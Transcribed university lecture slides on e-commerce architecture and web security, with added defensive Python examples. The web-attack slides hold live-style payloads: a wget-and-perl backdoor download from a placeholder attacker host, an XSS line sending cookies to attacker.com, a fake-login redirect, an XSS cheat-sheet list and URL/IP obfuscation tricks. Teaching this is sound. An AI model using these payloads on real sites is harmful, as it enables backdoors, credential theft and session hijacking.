EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Post on 16-Jan-2016


Page 1: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

EC Architectural Framework and EC Security

Lecture 7

Supakorn Kungpisdan

Page 2: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

ITEC5611

S. Kungpisdan

Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics

Page 3: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


EC Framework (layered diagram, reconstructed from the slide)

• E-commerce Applications: Catalog based retail, Marketing & Advert., Banking & Investments, Supply Chain Management, Auctions, Home shopping, procurements
• Secure Payment Protocols / Online Payment Infrastructure
• Security and Encryption Technology
• Network Protocol Standards / Network Infrastructure (Internet)
• Business Service Infrastructure: Directories, Search Engines etc.
• Networked Multimedia content publishing technologies (HTML, XML, JAVA, Graphics, Video tools etc.)
• Information Distribution & Messaging Technologies (HTTP, SMTP, etc.)
• Legal and Public Policy Framework
• Public key, Identification and Authentication Infrastructure

Page 4: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Network Infrastructure

• The Internet Superhighway is responsible for seamless, reliable transportation of information among host devices.
• Local Area Networks, IEEE 802.3 Standards and Ethernet
• Wide Area Networks
• The Seamless Interface is offered through
  – Internet and TCP/IP Model
  – IP Addressing and Domain Naming System
  – Internet Industry Structure

Page 5: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Information Distribution Technologies

• Standard Protocols for Information Distribution on Internet
  – File Transfer Protocol (FTP)
  – Simple Mail Transfer Protocol (SMTP)
  – Hyper Text Transfer Protocol (HTTP)
  – Web Server Implementations
    • Apache Web Server
    • Microsoft's IIS

Page 6: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Multimedia Publishing Technologies

• Information Publishing and Web Browsers
  – Hyper Text Markup Language (HTML)
  – Forms and Common Gateway Interface
  – Active Server Pages (ASP)
  – Dynamic HTML
  – HTML Editors
  – XML
• Multimedia Content
  – Graphics and Image Formats
  – Web Image Formats
  – Other Multimedia objects
• VRML (Virtual Reality Markup Language)

Page 7: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Security and Encryption

• Importance of security for Electronic Commerce and inherent vulnerability of the Internet
• Protecting the Web (HTTP) Service
• The Issues in Transaction Security
  – Cryptography and Cryptanalysis
  – Symmetric key cryptographic Algorithms
  – Public-key Algorithms
  – Authentication protocols
  – Integrity and Non-repudiation
• Digital Certificates and Signatures
• Electronic Mail Security
  – PGP, S/MIME
• Security protocols for E-commerce
  – SSL, TLS

Page 8: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Payment Services

• Payment Systems
• Characteristics of Online Payment Systems
  – Pre-Paid Electronic Payment Systems
  – Instant-paid Electronic Payment Systems
  – Post-Paid Electronic Payment Systems
• Some Electronic Payment Systems
  – Secure Electronic Transaction (SET) for Credit Cards
  – E-cash
  – NetCheque

Page 9: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Business Service Infrastructure

• Searching and Locating Information on Web Space
• Information Directories
• Search Engines
• Improving the search results
• Internet Advertising

Page 10: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Public Policy and Legal Infrastructure

• Universal Access to Network Infrastructure
• Model Law for Electronic Commerce
• Taxation Issues in Electronic Commerce
• Need for Public Key Infrastructure (PKI)
• Digital Certificates and Digital Signatures

Page 11: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics

Page 12: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Basic Security Issues

• From the user's perspective:
  – Is the Web server owned and operated by a legitimate company?
  – Does the Web page and form contain any malicious or dangerous code or content?
  – Will the owner of the Web site refrain from distributing the information the user provides to some other party?

Page 13: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Basic Security Issues (cont.)

• From the company's perspective:
  – How does the company know the user will not attempt to break into the Web server or alter the pages and content at the site?
  – How does the company know that the user will not try to disrupt the server so that it is not available to others?

Page 14: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Basic Security Issues (cont.)

• From both parties' perspectives:
  – How do both parties know that the network connection is free from eavesdropping by a third party "listening" on the line?
  – How do they know that the information sent back and forth between the server and the user's browser has not been altered?

Page 15: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Goals of Computer Security (CIA)

• Confidentiality
  – Ensure that the message is accessible only by authorized parties
• Integrity
  – Ensure that the message is not altered during the transmission
• Availability
  – Ensure that the information on the system is available for authorized parties at appropriate times


Page 16: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Basic Security Issues

• Authentication
• Authorization
• Auditing
• Confidentiality (Privacy)
• Integrity
• Availability
• Non-repudiation

Page 17: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Security Trends


Page 18: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Vulnerabilities, Threats, and Attacks

• Vulnerability
  – A weakness in the security system
  – E.g. a program flaw, poor security configuration, bad password policy
• Threat
  – A set of circumstances or people that potentially causes loss or harm to a system
• Attack
  – An action or series of actions to harm a system


Page 19: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Relationships among different Security Components


Page 20: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Relationship of Threats and Vulnerabilities


Page 21: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


How Hackers Exploit Weaknesses


Page 22: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


General Security Issues at EC Sites

Page 23: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics

Page 24: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Types of Security Incidences


Page 25: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Hackers

• White Hat Hackers

• Grey Hat Hackers

• Script Kiddies

• Hacktivists

• Crackers or Black Hat Hackers


Page 26: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Hackers’ Steps

1. Gather information: telephone conversation, password crackers
2. Gain initial system access: often limited access and rights
3. Increase privileges and expand access: try to get root privilege
4. Carry out purpose of the attack: steal or destroy information
5. Install backdoors: build entrance for the next visit
6. Cover tracks and exit: remove all traces, usually by modifying log files


Page 27: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Malicious Codes

• Viruses
  – A destructive program code that attaches itself to a host, copies itself and spreads to other hosts
  – A virus replicates and remains undetected until it is activated.
• Worms
  – Unlike viruses, worms are independent of other programs or files. No trigger is needed.
• Trojans
  – An externally harmless program that contains malicious code
• Spyware
  – Software installed on a target machine that sends information back to an owning server


Page 28: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Security Incidences

• Probe
  – A probe is characterized by unusual attempts to gain access to a system or to discover information about the system.
  – Sometimes followed by a more serious security event, but they are often the result of curiosity or confusion.
• Scan
  – A large number of probes done using an automated tool.
  – Often a prelude to a more directed attack on systems whose security can be breached.
• Account Compromise
  – Unauthorized use of a computer account by someone other than the account owner, without involving system-level or root-level privileges. It might expose the victim to serious data loss, data theft, or theft of services.
  – The lack of root-level access means that the damage can usually be contained, but a user-level account opens up avenues for greater access to the system.

Page 29: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Security Incidences (cont’d)

• Root Compromise
  – Similar to an account compromise, except that the account that has been compromised has special privileges on the system.
• Packet Sniffer
  – A program that captures data from information packets as they travel over the network.

Page 30: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Security Incidences (cont’d)

• denial-of-service (DoS) attack: An attack on a Web site in which an attacker uses specialized software to send a flood of data packets to the target computer with the aim of overloading its resources
• distributed denial-of-service (DDoS) attack: A denial-of-service attack in which the attacker gains illegal administrative access to as many computers on the Internet as possible and uses the multiple computers to send a flood of data packets to the target computer

Page 31: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Using Zombies in a Distributed DoS Attack

Page 32: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics

Page 33: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Attacking Web Applications

• The majority of vulnerabilities are caused by a lack of proper input validation by the application before processing user-supplied data

• This can allow attackers to disclose information about the site, steal information from backend DBs, or execute binary code on the web server


Page 34: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

SQL Injection

• Many web applications rely on backend DBs for information storage and retrieval.

• Sometimes a script will perform a DB query using input supplied from a web page, without verifying that the input does not contain any escape characters

• Consider the following:

  Query = "SELECT * FROM users WHERE username = '{$_POST['user']}' AND password = '{$_POST['pass']}'";

• With crafted input the executed query becomes:

  "SELECT * FROM users WHERE username = 'bob' AND password = ' ' OR 1=1 ";
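The bypass on this slide and its fix, as an added Python example using sqlite3 (not the lecture's PHP code): login_vulnerable() splices the form values into the SQL text exactly as the slide's query string does, while login_parameterized() binds them as placeholders. The users table and its row are constructed sample data; the injected password uses the slide's OR trick in a form that keeps the statement well formed.

```python
import sqlite3


def make_db():
    """Build an in-memory users table with one constructed sample row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('bob', 's3cret')")  # constructed sample row
    conn.commit()
    return conn


def build_query_vulnerable(user, pw):
    """Same construction as the slide's PHP: form values spliced into the SQL text."""
    return f"SELECT * FROM users WHERE username = '{user}' AND password = '{pw}'"


def login_vulnerable(conn, user, pw):
    """True when a row matches. A quote in the input rewrites the WHERE clause,
    so the attacker's text becomes SQL syntax instead of a password value."""
    return conn.execute(build_query_vulnerable(user, pw)).fetchone() is not None


def login_parameterized(conn, user, pw):
    """Hardened form: placeholders keep the input as data, never as SQL syntax."""
    query = "SELECT * FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (user, pw)).fetchone() is not None


# The slide's trick: a quote closes the password literal and an OR makes the
# WHERE clause true for every row. (Chosen so the statement stays well formed.)
INJECTED_PASSWORD = "' OR '1'='1"


def demo():
    """Run both login paths with the real password and with the injected one."""
    conn = make_db()
    return {
        "vulnerable_correct": login_vulnerable(conn, "bob", "s3cret"),
        "vulnerable_injected": login_vulnerable(conn, "bob", INJECTED_PASSWORD),
        "parameterized_correct": login_parameterized(conn, "bob", "s3cret"),
        "parameterized_injected": login_parameterized(conn, "bob", INJECTED_PASSWORD),
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'logged in' if ok else 'rejected'}")
```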


Page 35: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Code Injection

• Sometimes user-supplied strings are not properly checked for escape characters before being passed to commands as arguments

• Consider a PHP script that takes a string supplied from web page form and passes it to the nslookup utility


Page 36: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Code Injection (cont.)

• If the user supplies ";ls -la /", the script executes the command line "nslookup ;ls -la /", resulting in a listing of the root directory being printed out


Page 37: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Code Injection (cont.)

• wget and perl commands could be used to download and run a backdoor on the web server by supplying the following line to the script

• ;wget http://attackersite/backdoor.pl;perl backdoor.pl
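The nslookup script's failure and its hardened form, as an added Python example (not the lecture's PHP script): shell_command_vulnerable() mirrors pasting the form value into a shell line, commands_in_shell_line() shows how a POSIX shell splits that line at the ';', and nslookup_argv() validates the value against a hostname pattern and builds an argument vector for subprocess with no shell involved. Nothing here executes nslookup; the function names and the hostname regex are this example's own.

```python
import re
import shlex

# Allow-list pattern for a DNS hostname (RFC 1123 style labels, dot separated).
# Anything a shell could interpret (';', '|', '&', spaces, quotes) fails this test.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def shell_command_vulnerable(user_input):
    """How the slide's script behaves: the form value is pasted into a shell
    command line, so the shell treats any ';' in it as a command separator."""
    return "nslookup " + user_input


def commands_in_shell_line(command_line):
    """Split a command line into the separate commands a POSIX shell would run,
    using shlex's punctuation_chars mode so ';', '|' and '&' become tokens."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "|", "&", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


def is_valid_hostname(value):
    """True only for input that matches the hostname allow-list above."""
    return HOSTNAME_RE.match(value) is not None


def nslookup_argv(user_input):
    """Hardened form: validate first, then build an argument vector to hand to
    subprocess.run(argv) (no shell=True, so no separator has any meaning).
    Raises ValueError instead of running anything for bad input."""
    if not is_valid_hostname(user_input):
        raise ValueError("refusing to look up non-hostname input: %r" % user_input)
    return ["nslookup", user_input]


if __name__ == "__main__":
    for value in ("example.com", ";ls -la /"):
        line = shell_command_vulnerable(value)
        print(f"{line!r} runs {len(commands_in_shell_line(line))} command(s)")
        print("  hostname check:", "accepted" if is_valid_hostname(value) else "rejected")
```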


Page 38: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Cross-Site Scripting (XSS)

• XSS vulnerabilities allow attackers to inject code or HTML into a web page that will be executed when a different user visits that page

• These attacks target visitors to a web site, not the site itself, and occur when a web page does not properly sanitize user input before using it in output

• In fact, on vulnerable websites it is possible to execute HTML and JavaScript code through an unsanitized form, which in combination can be really dangerous: it is possible to steal cookies or to redirect web pages to a fake login in order to steal usernames and passwords.


Page 39: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Types of XSS

• The term XSS is actually a bit elusive because it covers different kinds of attacks that rely on different attacking mechanisms.
• There are actually three types of Cross-Site Scripting, commonly named:
  – DOM-Based XSS
  – Non-persistent XSS
  – Persistent XSS


Ref: http://www.milw0rm.com/papers/146
Ref: http://en.wikipedia.org/wiki/Cross_Site_Scripting


Page 40: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

DOM-based XSS

• DOM-based or Type 0 XSS, also referred to as local XSS, is based on the standard object model for representing HTML or XML, called the Document Object Model (DOM).
• DOM-based XSS allows an attacker to work not on a victim website but on the victim's local machine


Page 41: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

DOM-based XSS (cont.)

1. The attacker creates a well-built malicious website
2. The ingenuous user opens that site
3. The user has a vulnerable page on his machine
4. The attacker's website sends commands to the vulnerable HTML page
5. The vulnerable local page executes those commands with the user's privileges on that machine
6. The attacker easily gains control of the victim computer.


Page 42: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Exploit Scenario

1. Mallory sends the URL of a maliciously constructed web page to Alice, using email or another mechanism.

2. Alice clicks on the link.

3. The malicious web page's JavaScript opens a vulnerable HTML page installed locally on Alice's computer.

4. The vulnerable HTML page contains JavaScript which executes in Alice's computer's local zone.

5. Mallory's malicious script now may run commands with the privileges Alice holds on her own computer.


Page 43: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

DOM-based XSS (cont.)

• DOM-based XSS is really dangerous because it operates strictly on the victim's system, and as long as the user does not look after his/her security and does not apply updates, the DOM-based XSS will keep working.
• Solution: To prevent this kind of attack there are only two things to take care of:
  – Do not visit untrusted websites
  – Keep your system up to date


Page 44: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Non-persistent XSS

• The non-persistent or Type 1 XSS is also referred to as a reflected vulnerability, and is by far the most common type.

• It's commonly named as "non-persistent" because it works on an immediate HTTP response from the victim website

• It shows up when data provided by a web client is used immediately by server-side scripts to generate a page of results for that user.

• If unvalidated user-supplied data is included in the resulting page without HTML encoding, this will allow client-side code to be injected into the dynamic page


Page 45: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Non-persistent XSS: Search Engine

• The attacker writes some arbitrary HTML code in the search textbox and, if the website is vulnerable, the result page will render those HTML elements.
• If this happens, in 99% of cases the search engine will also execute arbitrary JavaScript code.


Page 46: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Example

1. Assume that a website works like this: http://www.example.com/search.php?text=TEXTTOSEARCH

2. Try to include some HTML tags in the "text" variable: http://www.example.com/search.php?text=<img src="http://attacker.com/image.jpg">

If the website is vulnerable, it will display the attacker's image in the result webpage.


Page 47: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Example (cont.)

3. Then try to write some JavaScript code: http://www.example.com/search.php?text=<script>alert(document.cookie)</script>

The website will probably return an alert popup with the current cookie for the site itself.


Page 48: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Example (cont.)

• This vulnerability can be used by the attacker to steal information from users of the victim website, for example by sending them an email with a URL like: http://www.victim.com/search.php?text=MALICIOUSCODE
• To make that URL less suspicious it is useful to encode the code in URL hex values. For example the code <script>alert("XSS")</script> encoded will look like: %3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E


Page 49: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Example (cont.)

• And so the malicious URL will turn from:

http://www.victim.com/search.php?text=<script>alert("XSS")</script>

into: http://www.victim.com/search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E

which, for a clueless user, is a lot less suspicious than the first one.


Page 50: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Example (cont.)

1. The attacker realizes that the victim website is vulnerable to XSS

2. The attacker creates on his website an ad-hoc page which is used to steal sensitive information, e.g. cookies, or to present a fake login for the victim website.

3. The attacker provides to a user a crafted URL containing malicious code like:

http://www.victim.com/search.php?text=<script>document.location("http://attackersite.com/fakelogin.php")</script>

encoded in hex.

4. The user visits the web page and is silently redirected to the attacker's fake login

5. The user is invited to log into the system and does so.

6. The fake login steals the username and password of the victim.


Page 51: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Exploit Scenario

1. Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and store sensitive information, such as billing information.

2. Mallory observes that Bob's website contains a reflected XSS vulnerability.

3. Mallory crafts a URL to exploit the vulnerability, and sends Alice an email, making it look as if it came from Bob (i.e., the email is spoofed).

4. Alice visits the URL provided by Mallory while logged into Bob's website.


Page 52: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Exploit Scenario (cont.)

5. The malicious script embedded in the URL executes in Alice's browser, as if it came directly from Bob's server. The script can be used to email Alice's session cookie to Mallory. Mallory can then use the session cookie to steal sensitive information available to Alice (authentication credentials, billing info, etc) without Alice's knowledge.


Page 53: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Interesting Example

• http://www.yannarak.net/node/2


Page 54: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Persistent XSS

• Persistent XSS is similar to non-persistent XSS
  – Both work on a victim site and try to steal user information
• However, the attacker does not need to provide the crafted URL to the users
• Because the website itself permits users to insert fixed data into the system
  – This is the case, for example, of "guestbooks"
• Usually users use that kind of tool to leave messages to the owner of the website
• An attacker can insert some malicious code in his message and make ALL visitors victims of it.


Page 55: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Exploit Scenario

1. Bob hosts a web site allowing users to post messages and other content to the site for later viewing by other members.

2. Mallory notices that Bob's website is vulnerable to a type 2 XSS attack.

3. Mallory posts a message, controversial in nature, which may encourage many other users of the site to view it.

4. Upon merely viewing the posted message, site users' session cookies or other credentials could be taken and sent to Mallory's web server without their knowledge.

5. Later, Mallory logs in as other site users and posts messages on their behalf....


Page 56: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Exploit Scenario (cont.)

• This works when the tool provided (the guestbook in the example) does not do any check on the content of the inserted message: it just inserts the data provided by the user into the result page.
• The attacker could easily insert as much code as he wants into the tool, for example:

<img src="javascript:document.location ('http://attacker.com/steal.php?cookie=' . encodeURI(document.cookie));">

This allows the attacker to steal the cookie of the victim user.
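Both the reflected search-page case (pages 44 to 50) and the stored guestbook case above come down to the same two controls, shown here as an added Python example (not the lecture's code): HTML-encoding user input before it reaches the page, and undoing the URL hex encoding the slides use to disguise a payload so a log check can see it. The request lines are constructed, attacker.example is a placeholder, and the marker regex is a simple heuristic.

```python
import html
import re
from urllib.parse import parse_qs, unquote

# Constructed request lines (not real traffic): a benign search, the slide's
# hex-encoded reflected payload, and a guestbook post of the img/javascript: kind.
SAMPLE_REQUESTS = """\
GET /search.php?text=shoes HTTP/1.1
GET /search.php?text=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3B%3C%2F%73%63%72%69%70%74%3E HTTP/1.1
GET /guestbook.php?msg=%3Cimg%20src%3D%22javascript%3Adocument.location%28%27http%3A%2F%2Fattacker.example%2Fsteal.php%27%29%22%3E HTTP/1.1
"""


def render_search_vulnerable(text):
    """The slide's search page: user input dropped straight into the HTML."""
    return f"<p>Results for: {text}</p>"


def render_search_escaped(text):
    """Hardened: HTML-encode before output so angle brackets and quotes become
    entities and the browser shows the text instead of parsing it as markup."""
    return f"<p>Results for: {html.escape(text, quote=True)}</p>"


# Heuristic markers of script injection in a decoded parameter value.
MARKERS = re.compile(r"<\s*script|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)


def fully_decode(value, rounds=3):
    """Undo the URL hex encoding from the slides, repeatedly in case the
    payload was encoded more than once; stops when decoding changes nothing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def flag_requests(log_text):
    """Return (path, parameter, decoded value) for every request whose query
    string carries an injection marker. The same check covers the reflected
    search case and a stored guestbook post, since both arrive as parameters."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 2 or "?" not in fields[1]:
            continue
        path, query = fields[1].split("?", 1)
        for name, values in parse_qs(query, keep_blank_values=True).items():
            for value in values:
                decoded = fully_decode(value)
                if MARKERS.search(decoded):
                    hits.append((path, name, decoded))
    return hits


if __name__ == "__main__":
    print(render_search_escaped('<script>alert("XSS")</script>'))
    for path, name, decoded in flag_requests(SAMPLE_REQUESTS):
        print(f"flagged {path} param {name!r}: {decoded}")
```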


Page 57: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

More about XSS

• In order to make the attack less suspicious it's possible to "obfuscate" the IP address of the attacker's website, encoding the IP address in three formats:
  – Dword Address
  – Hex Address
  – Octal Address
• For example the IP address 127.0.0.1 will look like:
  – Dword: 2130706433
  – Hex: 0x7f.0x00.0x00.0x01
  – Octal: 0177.0000.0000.0001
• Try for example: http://0x7f.0x00.0x00.0x01/ and it will open your localhost web server.
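A normaliser for the dword, hex and octal host forms on this slide, as an added Python example (not from the lecture), written from the defender's side: it rewrites an obfuscated IPv4 literal in a logged or submitted URL back to dotted-decimal so it can be matched against a block list or searched for. It goes beyond the slide's three forms by also applying the inet_aton rule for one to three components; the function names are this example's own.

```python
import re
from urllib.parse import urlsplit


def _parse_part(part):
    """One dotted component in the notations the slide lists: 0x.. hex,
    leading-zero octal, or plain decimal. Returns None if it is not numeric."""
    if re.fullmatch(r"0[xX][0-9A-Fa-f]+", part):
        return int(part[2:], 16)
    if re.fullmatch(r"0[0-7]*", part):  # "0", "0000", "0177" ...
        return int(part, 8)
    if re.fullmatch(r"[1-9][0-9]*", part):
        return int(part)
    return None


def normalize_ip_literal(host):
    """Canonical dotted-decimal form of a numeric host, or None if the host is
    not an IPv4 literal. With fewer than four components the last number fills
    the remaining bytes, as inet_aton and browsers do ("127.1" -> "127.0.0.1")."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_parse_part(p) for p in parts]
    if any(v is None for v in values):
        return None
    *leading, last = values
    remaining = 4 - len(leading)
    if any(v > 255 for v in leading) or last >= 256 ** remaining:
        return None
    octets = leading + [(last >> (8 * i)) & 0xFF for i in reversed(range(remaining))]
    return ".".join(str(o) for o in octets)


def normalize_url_host(url):
    """Rewrite the host of a URL into dotted-decimal when it is an obfuscated
    IPv4 literal; any other URL is returned unchanged. Userinfo and port are kept."""
    parts = urlsplit(url)
    host = parts.hostname
    if host is None:
        return url
    canonical = normalize_ip_literal(host)
    if canonical is None or canonical == host:
        return url
    netloc = canonical
    if parts.port is not None:
        netloc += f":{parts.port}"
    if parts.username is not None:
        userinfo = parts.username
        if parts.password is not None:
            userinfo += f":{parts.password}"
        netloc = f"{userinfo}@{netloc}"
    return parts._replace(netloc=netloc).geturl()


if __name__ == "__main__":
    for sample in ("2130706433", "0x7f.0x00.0x00.0x01", "0177.0000.0000.0001", "example.com"):
        print(f"{sample:>22} -> {normalize_ip_literal(sample)}")
    print(normalize_url_host("http://0x7f.0x00.0x00.0x01/"))
```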


Page 58: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Possible XSS Cheats

• <IMG SRC="javascript:alert('XSS');">
• <IMG SRC=javascript:alert('XSS')>
• <IMG SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#x41;&#x59;&#x48;&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>
• <IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">
• <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
• <<SCRIPT>alert("XSS");//<</SCRIPT>
• <iframe src=http://example.com/scriptlet.html <
• <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
• <BODY BACKGROUND="javascript:alert('XSS')">
• <BODY ONLOAD=alert(document.cookie)>
• <IMG DYNSRC="javascript:alert('XSS')">


Page 59: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Possible XSS Cheats (cont.)

• <BR SIZE="&{alert('XSS')}">
• <IMG SRC='vbscript:msgbox("XSS")'>
• <TABLE BACKGROUND="javascript:alert('XSS')">
• <DIV STYLE="width: expression(alert('XSS'));">
• <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
• <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
• <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
• <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
• <A HREF="javascript:document.location='http://www.example.com/'">XSS</A>


Page 60: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan

Information Disclosure

• An error page can disclose the path of the web server's root directory

• The path disclosure can aid attackers performing reconnaissance on the site

• phpinfo.php, part of a default PHP install, is a script providing the OS and software version on the host and other related information

• Google for inurl:phpinfo.php to see exactly how much information is leaked


Page 61: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Outline

• EC Architectural Framework
• EC Security
  – Basic Security Issues
  – Security Incidences
  – Attacking Web Applications
  – Access Controls
  – Securing EC Communications
  – Securing EC Networks
  – Operations Security
  – Law, Investigation, and Ethics

Page 62: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


CIA for Access Control

• Confidentiality
  – Not disclosed to unauthorized persons
• Integrity
  – Prevention of modification by unauthorized users
  – Prevention of unauthorized changes by otherwise authorized users
  – Internal and External Consistency
    – Internal Consistency within the system (e.g. within a database the sum of subtotals is equal to the sum of all units)
    – External Consistency: database with the real world (e.g. database total is equal to the actual inventory in the warehouse)
• Availability
  – Timely access

Page 63: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Security Controls

Ref: S. Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill

Page 64: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Security Controls (cont.)

Ref: S. Harris, CISSP All-in-One Exam Guide, 3rd Edition, McGraw-Hill

Page 65: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Authentication

• Something you know
  – Passwords, PINs
• Something you have
  – Tokens, smart cards
• Something you are
  – Biometrics

Page 66: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Biometrics

• biometric systems: Authentication systems that identify a person by measurement of a biological characteristic, such as fingerprints, iris (eye) patterns, facial features, or voice
• physiological biometrics: Measurements derived directly from different parts of the body (e.g., fingerprint, iris, hand, facial characteristics)
• behavioral biometrics: Measurements derived from various actions and indirectly from various body parts (e.g., voice scans or keystroke monitoring)

Page 67: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Biometrics (cont.)

• Fingerprints
• Palm Scans
• Hand Geometry
• Retina Scans
• Iris Scans
• Facial Scans
• Voice Print
• Signature Dynamics
• Keyboard Dynamics

Page 68: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


Single Sign-on

• Kerberos
• Allows a user to access many services from only one authentication
• Symmetric key encryption
  – KDC – Kerberos-trusted Key Distribution Center
  – AS – Authentication Server
  – TGS – Ticket Granting Service

Page 69: EC Architectural Framework and EC Security Lecture 7 Supakorn Kungpisdan


